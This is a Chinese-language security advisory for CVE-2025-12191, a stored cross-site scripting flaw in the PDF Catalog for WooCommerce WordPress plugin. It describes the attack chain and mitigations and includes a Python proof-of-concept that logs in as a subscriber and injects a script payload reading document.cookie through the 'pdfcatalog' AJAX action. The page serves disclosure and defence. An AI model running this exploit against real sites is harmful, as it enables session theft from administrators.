CVE-2025-12191 WordPress PDF Catalog for WooCommerce存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12191

漏洞类型

存储型XSS (Stored Cross-Site Scripting)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PDF Catalog for WooCommerce (WordPress插件)

漏洞概述

CVE-2025-12191是WordPress插件PDF Catalog for WooCommerce中的一个存储型跨站脚本(XSS)漏洞。该插件用于为WooCommerce在线商店生成PDF产品目录。漏洞源于插件的'pdfcatalog' AJAX动作中，对用户输入的清理和输出转义不足。攻击者只需拥有订阅者(Subscriber)级别的账户即可利用此漏洞，将恶意JavaScript代码注入到页面中。当其他用户访问包含注入代码的页面时，恶意脚本将自动执行，可能导致会话劫持、敏感信息窃取、网页篡改等严重后果。由于该漏洞为存储型XSS，恶意代码会被永久保存在服务器端，影响范围更广。

技术细节

该漏洞位于PDF Catalog for WooCommerce插件的AJAX处理函数中，具体涉及'pdfcatalog'动作。攻击者通过构造包含恶意JavaScript代码的请求发送给该AJAX端点，由于插件未对用户提交的数据进行充分的输入验证和输出转义，攻击者注入的脚本被直接存储到数据库中。当管理员或其他用户访问相关页面时，这些未经过滤的数据被读取并嵌入到HTML响应中，导致恶意脚本在受害者浏览器中执行。攻击者可以利用此漏洞窃取用户会话Cookie、进行钓鱼攻击或执行其他恶意操作。攻击的利用条件较低，只需最低订阅者权限即可发起攻击，且无需目标用户点击任何链接，只要访问被注入的页面即可触发。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress订阅者级别账户权限

STEP 2

步骤2

构造包含恶意JavaScript代码的pdfcatalog AJAX请求

STEP 3

步骤3

发送恶意请求，payload被存储到数据库

STEP 4

步骤4

管理员或用户访问包含注入代码的页面

STEP 5

步骤5

浏览器执行恶意脚本，攻击者窃取会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12191 PoC - Stored XSS via pdfcatalog AJAX action
# Affected: PDF Catalog for WooCommerce <= 1.1.18

import requests
import sys

target_url = "http://target-wordpress-site.com"
# Login to get valid nonce and cookies
login_url = f"{target_url}/wp-login.php"
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

def exploit_cve_2025_12191():
    """Exploit stored XSS in pdfcatalog AJAX action"""
    
    # Step 1: Authenticate with subscriber-level account
    session = requests.Session()
    login_data = {
        'log': 'attacker_username',
        'pwd': 'attacker_password',
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Inject XSS payload via pdfcatalog AJAX action
    exploit_data = {
        'action': 'pdfcatalog',
        'pdf_title': f'{xss_payload}',
        'pdf_description': f'{xss_payload}',
    }
    
    response = session.post(ajax_url, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] XSS payload injected successfully")
        print("[*] Payload will execute when admin views the catalog page")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit_cve_2025_12191()

影响范围

PDF Catalog for WooCommerce <= 1.1.18

防御指南

临时缓解措施

如果无法立即更新插件，可暂时禁用PDF Catalog for WooCommerce插件，或使用Web应用防火墙(WAF)规则阻止'pdfcatalog' AJAX动作的恶意请求。同时监控管理员账户的异常活动，并考虑强制重置所有用户会话。